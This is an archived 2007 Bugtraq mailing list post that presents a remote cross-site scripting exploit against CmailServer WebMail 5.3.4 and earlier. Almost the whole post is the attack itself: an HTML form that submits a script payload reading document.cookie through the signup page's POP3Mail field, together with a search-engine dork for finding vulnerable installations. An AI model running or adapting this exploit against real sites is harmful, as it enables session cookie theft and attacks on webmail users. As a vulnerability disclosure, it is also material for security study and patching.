| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070407183701.15984.qmail@securityfocus.com>
Date: 7 Apr 2007 18:37:01 -0000
From: ajannhwt@...mail.com
To: bugtraq@...urityfocus.com
Subject: CmailServer WebMail <= V.5.3.4 (signup) Remote XSS Exploit
<html>
<head>
<script>
//'===============================================================================================
//'[Script Name: CmailServer WebMail <= V.5.3.4 (signup) Remote XSS Exploit
//'[Coded by : ajann
//'[Author : ajann
//'[Contact : :(
//'[Dork : "inurl:/mail/signup.asp"
//'[Dork Ex. : http://www.google.com.tr/search?q=inurl:/mail/signup.asp&hl=tr&start=0&sa=N
//'[S.Page : http://www.youngzsoft.net/
//'[Using : Please "action" edit and submit
//'===============================================================================================
</script>
</head>
<title>Cmail XSS </title>
<body>
<Form Method="Post" Action="[target]/signup.asp">
<Input Type=Hidden Name=Signup Value="0">
<input type="hidden" name="Account" size="30">
<Input Type="hidden" Name="Pass" size="30" value="">
<Input Type="hidden" Name="RePass" size="30" value="">
<input type="hidden" name="UserName" size="30" value="">
<Input type="hidden" Name="Comment" size="30" value="">
<Input Name="POP3Mail" size="30" value="<script>JavaScript:alert(document.cookie);</script>">
<Input Type="Submit" Value="Submit XSS">
</Form>
</body>
</html>